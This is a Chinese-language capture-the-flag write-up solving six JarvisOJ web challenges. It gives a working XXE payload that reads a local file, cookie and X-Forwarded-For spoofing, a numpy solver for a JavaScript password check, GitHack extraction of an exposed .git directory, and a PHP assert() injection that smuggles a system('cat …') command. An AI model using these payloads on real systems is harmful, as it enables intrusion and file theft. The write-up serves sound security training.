CTf-JarvisOJ-100-200

API调用 100

URL: http://web.jarvisoj.com:9882/

查看网页源码

Script 脚本部分如下。

<script>
function XHR() {
        var xhr;
        try {xhr = new XMLHttpRequest();}
        catch(e) {
            var IEXHRVers =["Msxml3.XMLHTTP","Msxml2.XMLHTTP","Microsoft.XMLHTTP"];
            for (var i=0,len=IEXHRVers.length;i< len;i++) {
                try {xhr = new ActiveXObject(IEXHRVers[i]);}
                catch(e) {continue;}
            }
        }
        return xhr;
    }

function send(){
 evil_input = document.getElementById("evil-input").value;
 var xhr = XHR();
 xhr.open("post","/api/v1.0/try",true);
 xhr.onreadystatechange = function () {
        if (xhr.readyState==4 && xhr.status==201) {
            data = JSON.parse(xhr.responseText);  // json格式
            tip_area = document.getElementById("tip-area");
            tip_area.value = data.task.search+data.task.value;
        }
    };
 xhr.setRequestHeader("Content-Type","application/json");
 xhr.send('{"search":"'+evil_input+'","value":"own"}');
}
</script>

上面的js代码，作用就是把我们输入的数据，用json打包发送过去。

XXE

本题的考点就是 XXE 漏洞的利用。
https://www.freebuf.com/articles/web/126788.html
https://security.tencent.com/index.php/blog/msg/69

这道题默认以json 发送数据。
修改 Content-Type

content-type
MediaType，即是Internet Media   
Type，互联网媒体类型；也叫做MIME类型，在Http协议消息头中，使用Content-Type来表示具体请求中的媒体类型信息。

常见的媒体格式类型如下：
text/html ： HTML格式
text/plain ：纯文本格式
text/xml ： XML格式
image/gif ：gif图片格式
image/jpeg ：jpg图片格式
image/png：png图片格式
以application开头的媒体格式类型：
application/xhtml+xml ：XHTML格式
application/xml ： XML数据格式
application/atom+xml ：Atom XML聚合格式
application/json ： JSON数据格式
application/pdf ：pdf格式
application/msword ： Word文档格式
application/octet-stream ： 二进制流数据（如常见的文档下载）

`

那么，发送数据应该是：

<?xml version="1.0"?>
<!DOCTYPE a [ 
    <!ENTITY data SYSTEM "file:///home/ctf/flag.txt">
]>
<c>&data;</c>

最终发送数据如下

POST /api/v1.0/try HTTP/1.1
Host: web.jarvisoj.com:9882
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: test/xml
Content-Length: 111
Connection: close
Referer: http://web.jarvisoj.com:9882/

<?xml version="1.0"?>
<!DOCTYPE a [ 
    <!ENTITY data SYSTEM "file:///home/ctf/flag.txt">
]>
<c>&data;</c>

得到回包，包含flag。

HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 38
Server: Werkzeug/0.9.4 Python/2.7.6
Date: Fri, 06 Mar 2020 08:16:53 GMT

<c>CTF{XxE_15_n0T_S7range_Enough}
</c>

admin 100

URL: http://web.jarvisoj.com:32792/
页面只有一个 hello world ，那么扫它的目录。
先发一次包，burp抓到然后右键 send to sprider ，可以扫到一个 robots.txt 文件

robots.txt 文件
参考链接：https://zh.wikipedia.org/wiki/Robots.txt   
存放于网站根目录下的ASCII编码的文本文件。

robots.txt文件中有个 admin_s3cr3t.php
访问一下，显示了一个假的flag。抓包，send to R 发现有个admin = 0 的字段，该admin=1得到一个flag。

HTTP/1.1 200 OK
Date: Fri, 06 Mar 2020 08:53:19 GMT
Server: Apache/2.4.18 (Unix) OpenSSL/1.0.2h PHP/5.6.21 mod_perl/2.0.8-dev Perl/v5.16.3
X-Powered-By: PHP/5.6.21
Set-Cookie: admin=0
Content-Length: 21
Connection: close
Content-Type: text/html; charset=UTF-8

flag{hello_admin~}

PORT51 100

URL：http://web.jarvisoj.com:32770/
题目让我用51端口去访问。那么到kali下，用命令

curl --local-port 51  http://web.jarvisoj.com:32770/
PCTF{M45t3r_oF_CuRl}

参考链接：
https://www.cnblogs.com/duhuo/p/5695256.html

LOCALHOST 150

URL: http://web.jarvisoj.com:32774/

题目说要localhost，意思也就是说要本地访问。
那么http头中 X-Forwarded-For 可以指出当前的客户IP。

参考链接：
https://developer.mozilla.org/zh-CN/docs/Web/HTTP/Headers/X-Forwarded-For
https://www.jianshu.com/p/792048d08ebc

发送

GET / HTTP/1.1
Host: web.jarvisoj.com:32774
X-Forwarded-For:127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:67.0) Gecko/20100101 
...

得到

<body>
	<h3>Yeah!! Here's your flag:PCTF{X_F0rw4rd_F0R_is_not_s3cuRe}</h3>	
</body>
</html>

WEB? 150

URL：http://web.jarvisoj.com:9891/

题目让输入密码，也就是找密码了。输入错误，则返回Wrong Password!!
查看源码，可以看到有个可疑的app.js，里面代码居多。直接搜索 Wrong Password!!
找到关键的函数，仔细看就是加密的部分。

value:function(e){
	if(25!==e.length)
		return!1;
	for(var t=[],n=0;n<25;n++)
		t.push(e.charCodeAt(n));
	for(var r=[325799, ... ],
	o=[[11, ...],
	...],n=0;n<25;n++)
	{
		for(var i=0,a=0;a<25;a++)
			i+=t[a]*o[n][a];
		if(i!==r[n])
			return!1
	}
	return!0
},}
o 多维数组，r 是一维
相当于解线性方程 b = x*a; x = b/a;
r[n] = t[a]*o[n][a];
t[a] = r[n] / o[n][a];

python 提供了解线性方程的方法：
https://blog.csdn.net/HackerTom/article/details/98519196
https://zhuanlan.zhihu.com/p/24893371
脚本如下。

# utf-8
# python-3
import numpy 
r = numpy.array([325799,309234,317320,327895,298316,301249,330242,289290,273446,337687,258725,267444,373557,322237,344478,362136,331815,315157,299242,305418,313569,269307,338319,306491,351259])
o=numpy.array([[11,13,32,234,236,3,72,237,122,230,157,53,7,225,193,76,142,166,11,196,194,187,152,132,135],
	[76,55,38,70,98,244,201,125,182,123,47,86,67,19,145,12,138,149,83,178,255,122,238,187,221],
	[218,233,17,56,151,28,150,196,79,11,150,128,52,228,189,107,219,87,90,221,45,201,14,106,230],
	[30,50,76,94,172,61,229,109,216,12,181,231,174,236,159,128,245,52,43,11,207,145,241,196,80],
	[134,145,36,255,13,239,212,135,85,194,200,50,170,78,51,10,232,132,60,122,117,74,117,250,45],
	[142,221,121,56,56,120,113,143,77,190,195,133,236,111,144,65,172,74,160,1,143,242,96,70,107],
	[229,79,167,88,165,38,108,27,75,240,116,178,165,206,156,193,86,57,148,187,161,55,134,24,249],
	[235,175,235,169,73,125,114,6,142,162,228,157,160,66,28,167,63,41,182,55,189,56,102,31,158],
	[37,190,169,116,172,66,9,229,188,63,138,111,245,133,22,87,25,26,106,82,211,252,57,66,98],
	[199,48,58,221,162,57,111,70,227,126,43,143,225,85,224,141,232,141,5,233,69,70,204,155,141],
	[212,83,219,55,132,5,153,11,0,89,134,201,255,101,22,98,215,139,0,78,165,0,126,48,119],
	[194,156,10,212,237,112,17,158,225,227,152,121,56,10,238,74,76,66,80,31,73,10,180,45,94],
	[110,231,82,180,109,209,239,163,30,160,60,190,97,256,141,199,3,30,235,73,225,244,141,123,208],
	[220,248,136,245,123,82,120,65,68,136,151,173,104,107,172,148,54,218,42,233,57,115,5,50,196],
	[190,34,140,52,160,34,201,48,214,33,219,183,224,237,157,245,1,134,13,99,212,230,243,236,40],
	[144,246,73,161,134,112,146,212,121,43,41,174,146,78,235,202,200,90,254,216,113,25,114,232,123],
	[158,85,116,97,145,21,105,2,256,69,21,152,155,88,11,232,146,238,170,123,135,150,161,249,236],
	[251,96,103,188,188,8,33,39,237,63,230,128,166,130,141,112,254,234,113,250,1,89,0,135,119],
	[192,206,73,92,174,130,164,95,21,153,82,254,20,133,56,7,163,48,7,206,51,204,136,180,196],
	[106,63,252,202,153,6,193,146,88,118,78,58,214,168,68,128,68,35,245,144,102,20,194,207,66],
	[154,98,219,2,13,65,131,185,27,162,214,63,238,248,38,129,170,180,181,96,165,78,121,55,214],
	[193,94,107,45,83,56,2,41,58,169,120,58,105,178,58,217,18,93,212,74,18,217,219,89,212],
	[164,228,5,133,175,164,37,176,94,232,82,0,47,212,107,111,97,153,119,85,147,256,130,248,235],
	[221,178,50,49,39,215,200,188,105,101,172,133,28,88,83,32,45,13,215,204,141,226,118,233,156],
	[236,142,87,152,97,134,54,239,49,220,233,216,13,143,145,112,217,194,114,221,150,51,136,31,198]])
x = numpy.linalg.solve(o, r)   # 解出的 x 是浮点数，
flag=''
for i in x:
    flag+= chr(int(round(i))) # round()  方法返回浮点数 x 的四舍五入值。
print(flag)
print(x)

QWB{R3ac7_1s_interesting}

babyphp 200

题目是个网站，用burpsuite扫一下目录，看到有个flag页面，但是被注释了。
根据人家wp，说这个是git信息泄露。用 githack 可以down下代码。

参考：https://github.com/lijiejie/GitHack
python GitHack.py http://web.jarvisoj.com:32798/.git/

下载后，查看 index.php，发现参数 home 可以注入。

源码如下：
if (isset($_GET['page'])) {
	$page = $_GET['page'];
} else {
	$page = "home";
}

$file = "templates/" . $page . ".php";
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");
assert("file_exists('$file')") or die("That file doesn't exist!");

其中assert是个危险函数，其原型为

bool assert ( mixed $assertion [, string $description ] )

如果 assertion 是字符串，它将会被 assert() 当做 PHP 代码来执行。
php注入参考

使用

?page=flag'.system("cat templates/flag.php;").'

页面返回 That file doesn’t exist!
查看源码得到flag。